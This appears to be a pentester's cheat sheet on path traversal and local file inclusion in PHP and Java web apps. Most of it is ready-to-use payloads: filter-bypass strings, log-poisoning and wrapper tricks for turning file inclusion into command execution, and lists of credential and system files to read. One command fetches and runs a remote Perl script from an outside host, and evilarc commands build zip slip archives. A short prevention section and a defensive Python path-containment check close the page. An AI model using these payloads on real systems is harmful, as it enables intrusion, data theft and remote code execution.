# Path traversal
---
## Bypass filter
```
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
```
```
..../..../..../
...//...//
../../../../etc/passwd%001.png
```
* https://viblo.asia/p/directory-traversal-vulnerabilities-cac-lo-hong-directory-traversal-path-traversal-phan-5-EvbLbkY1Vnk
* https://book.hacktricks.xyz/pentesting-web/file-inclusion
* https://www.thegeekstuff.com/2008/10/6-awesome-linux-cd-command-hacks-productivity-tip3-for-geeks/
### Include a file when the path length is limited
https://hackmd.io/@Chivato/rkj-Y1GVI#COMPARE-THE-PAIR
https://bugs.php.net/bug.php?id=53465
`/dev/fd/<descriptor>` (a short path that refers to a file descriptor the process already has open)
---
## LFI -> RCE
### Upload a file -> include that file (log poisoning)
* Access log
* Auth log (/var/log/auth.log)
https://www.youtube.com/watch?v=4QCil9ijCvs&list=PL-HdylJurvuigkcPF7XZaWA2DLJ4plI1p&index=2
`ssh '<?php system($_GET["cmd"]); ?>'@<ip>` (the failed-login username is written to the auth log, which is then included)
### pearcmd.php
(or peclcmd.php)
https://hackmd.io/@endy/rkcs_lYF2#Magic-Login-Harder
https://viblo.asia/p/php-magic-ctf-writeups-gwd43kpK4X9
### Wrapper
* **expect://command**
(unfortunately the expect PHP extension is not enabled by default)
`?page=expect://ls`
https://www.4rth4s.xyz/2020/12/learning-all-about-lfi-local-file.html
https://www.php.net/manual/en/wrappers.expect.php
* **php://input**
POST body: `<?php system('id'); ?>`
* **ZIP://**
https://www.4rth4s.xyz/2020/06/root-me-local-file-inclusion-wrappers.html
### Other examples
https://hackmd.io/@endy/Skxms9eW2
https://github.com/synacktiv/php_filter_chain_generator
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
---
## Get info
https://www.4rth4s.xyz/2020/12/learning-all-about-lfi-local-file.html
### Info
```
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
/etc/mtab
/etc/inetd.conf
/var/log/dmesg
```
### Log file
```
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
```
### PROC files
(process and system resource information exposed by procfs)
```
/proc/sched_debug # Can be used to see what processes the machine is running
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ
```
---
## Misconfig
### PHP
https://ctf.rip/asis-ctf-2016-binarycloud-web-challenge/
```
<?php
// single slash case: parse_url() sees a path "/upload" and the query "/home/binarycloud/"
$uri = "/upload?/home/binarycloud/";
$data = parse_url($uri);
print_r($data);
// double slash case: the same input is now parsed as a host "upload" (scheme-relative URL)
// with the query "/home/binarycloud/", so path-based checks on the result no longer apply
$uri = "//upload?/home/binarycloud/";
$data = parse_url($uri);
print_r($data);
?>
```
### Java
* https://www.youtube.com/watch?v=XG14EstTgQ4
* https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
```
/..;/manager/html          # Tomcat manager, default credentials tomcat:tomcat
http://127.0.0.1/static../settings.py
http://tomcat/index.cfm/..;/x   # bypasses a 403 enforced by nginx
```
```
curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"'
```
`/login;/..;/admin`
---
## Zip slip
```
# archive entries with ../ components (depth 2, unix separators)
python evilarc.py -d 2 -o unix hack.txt
# entry named sess_... placed under var/lib/php/sessions
python evilarc.py -o unix -f exploit.zip sess_ -p var/lib/php/sessions
# archive a symlink without following it, so the link itself is stored
ln -s originfile newfile
zip -r --symlinks demo.zip symlinkfile
zip -y demo.zip symlinkfile
```
---
## Detection tool
https://github.com/capture0x/LFI-FINDER
---
## Prevent
* Always perform input validation: check the file name, content-type, headers and file size together whenever validating uploaded files
* Set permissions on upload directories; for an image upload feature, remove execute permission from the directory that stores the images
* Avoid exposing the path where uploaded files are stored
* Rename the file on the server once the upload succeeds, and hash the path of the uploaded file so the path cannot be guessed
* Run virus scanners on the server to block the upload of malicious files
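A containment check that covers both the Zip slip section and the validation advice above, written as an added Python example (not code from this page or from evilarc): the path is compared after filesystem resolution rather than by string stripping, so the `....//` bypasses and the `%00` truncation listed earlier are neutralised, and archive members are rejected when they resolve outside the extraction directory or are stored as symlinks. The directory names and the in-memory archive are constructed for the demonstration.

```python
import io
import os
import stat
import zipfile
from typing import List, Optional


def resolve_under(base: str, candidate: str) -> Optional[str]:
    """Return the canonical path of `candidate` if it stays inside `base`, else None.

    Resolving the real path means `....//` tricks that defeat a one-pass `../` strip
    are just harmless directory names here; a NUL byte (the `%00` trick) is rejected.
    """
    if "\x00" in candidate:
        return None
    base_real = os.path.realpath(base)
    # Leading slashes are dropped so an absolute name is still anchored at base.
    target = os.path.realpath(os.path.join(base_real, candidate.lstrip("/\\")))
    if os.path.commonpath([base_real, target]) != base_real:
        return None  # escaped the base directory
    return target


def unsafe_zip_entries(zf: zipfile.ZipFile, dest: str) -> List[str]:
    """List members that would land outside `dest` (zip slip) or are symlinks."""
    bad = []
    for info in zf.infolist():
        unix_mode = info.external_attr >> 16  # upper 16 bits carry the Unix mode
        if stat.S_ISLNK(unix_mode):
            bad.append(info.filename)  # a symlink member can point anywhere
        elif resolve_under(dest, info.filename) is None:
            bad.append(info.filename)
    return bad


def build_demo_zip() -> zipfile.ZipFile:
    """Constructed in-memory sample: one benign, one traversal, one symlink member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hack.txt", "benign")
        zf.writestr("../../var/lib/php/sessions/sess_demo", "traversal payload")
        link = zipfile.ZipInfo("link")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/etc/passwd")  # a symlink's target is stored as its body
    buf.seek(0)
    return zipfile.ZipFile(buf)
```

Run the same `resolve_under` check on upload file names before they touch the disk; the archive scan should run before any member is extracted.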